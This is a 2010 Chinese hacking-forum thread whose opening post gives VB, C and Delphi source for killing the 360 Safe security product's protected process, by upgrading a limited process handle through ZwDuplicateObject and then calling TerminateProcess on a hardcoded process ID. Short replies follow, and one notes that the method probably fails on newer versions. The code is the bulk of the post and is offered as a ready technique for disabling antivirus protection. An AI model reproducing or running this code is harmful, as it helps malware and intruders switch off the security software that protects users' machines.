论坛: 菜鸟乐园 标题: 再次干掉360保险箱VB/VC/delphi源码 复制本贴地址    
作者: xiaosi2007 [xiaosi2007]    论坛用户   登录
Option Explicit 
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long 
Private Declare Function ZwDuplicateObject _ 
                  Lib "NTDLL.DLL" (ByVal SourceProcessHandle As Long, _ 
                              ByVal SourceHandle As Long, _ 
                              ByVal TargetProcessHandle As Long, _ 
                              ByRef TargetHandle As Long, _ 
                              ByVal DesiredAccess As Long, _ 
                              ByVal HandleAttributes As Long, _ 
                              ByVal Options As Long) As Long 
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long 

Function FcOpenProcess&(p&) 
Dim ProcessHandle As Long 
Dim Rtn As Long 
ProcessHandle = OpenProcess(&H400, 0, p) 
If ProcessHandle <> 0 Then 
        Rtn = ZwDuplicateObject(-1, ProcessHandle, -1, VarPtr(ProcessHandle), &H1F0FFF, 0, 1) 
        FcOpenProcess = ProcessHandle 
End If 
End Function 
Private Sub Command1_Click() 
Dim ProcessHandle As Long 
ProcessHandle = FcOpenProcess&(1884) 
TerminateProcess ProcessHandle, 0 
End Sub 
/////////////////////// 
void KillProcess (ULONG dwProcessId) 

      HMODULE hNTDLL = GetModuleHandle("ntdll.dll"); 
      HANDLE  hProcessHandle; 
       
      _ZwDuplicateObject ZwDuplicateObject = 
            (_ZwDuplicateObject) GetProcAddress (hNTDLL, "ZwDuplicateObject"); 

      //打开进程权限要为0x400 
      hProcessHandle = OpenProcess(0x400, FALSE, dwProcessId); 
      if(hProcessHandle != NULL) 
      { 
            //复制句柄 
            ZwDuplicateObject((HANDLE)-1,(PHANDLE)hProcessHandle,(HANDLE)-1,&hProcessHandle,0x1F0FFF,0, 1); 
      } 

      TerminateProcess(hProcessHandle, 0); 

////////////////////////////////////// 
既然VB VC 都有了  也就不差  delphi的了 
///////////////////// 
附上D源码 
///////////////////// 
function ZwDuplicateObject( SourceProcessHandle,SourceHandle ,TargetProcessHandle ,TargetHandle,DesiredAccess ,HandleAttributes,Options: LongInt):LongInt stdcall; external ’NTDLL.DLL’ name ’ZwDuplicateObject’; 

Function FcOpenProcess(p:Longint):Longint; 
var 
Rtn,ProcessHandle:Longint; 
begin 
ProcessHandle := OpenProcess($400, False, p); 
result:=0; 
If ProcessHandle <> 0 Then 
begin 
        Rtn := ZwDuplicateObject(-1, ProcessHandle, -1, Integer(@ProcessHandle), $1F0FFF, 0, 1); 
        result := ProcessHandle 
End; 
End; 

procedure TForm1.Button1Click(Sender: TObject); 
var 
  ProcessHandle :Longint; 
begin 
ProcessHandle := FcOpenProcess(3440); 
TerminateProcess( ProcessHandle, 0 ); 
end;



地主 发表时间: 10-07-16 17:49
回复: siyuan [xiaosi2007]   论坛用户   登录
感兴趣的人都去哪了,

估计最新版的失效~~~~~~

B1层 发表时间: 10-10-09 10:22
回复: bking [bking]   版主   登录
不搞这个了.  顶一个

B2层 发表时间: 10-10-19 13:22
回复: siyuan [xiaosi2007]   论坛用户   登录


B3层 发表时间: 10-10-27 13:06
回复: li4415 [li4415]   论坛用户   登录
有那么牛吗?》怎么搞地?

B4层 发表时间: 10-10-31 17:26
回复: rui_888 [rui_888]   论坛用户   登录
看不懂


B5层 发表时间: 10-12-03 20:53
回复: liaogw123 [liaogw123]   论坛用户   登录
我刚学的,只看懂一些,有些就看不懂了。。。不过你太有才了额,,这你都弄。。

B6层 发表时间: 11-01-23 15:53

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号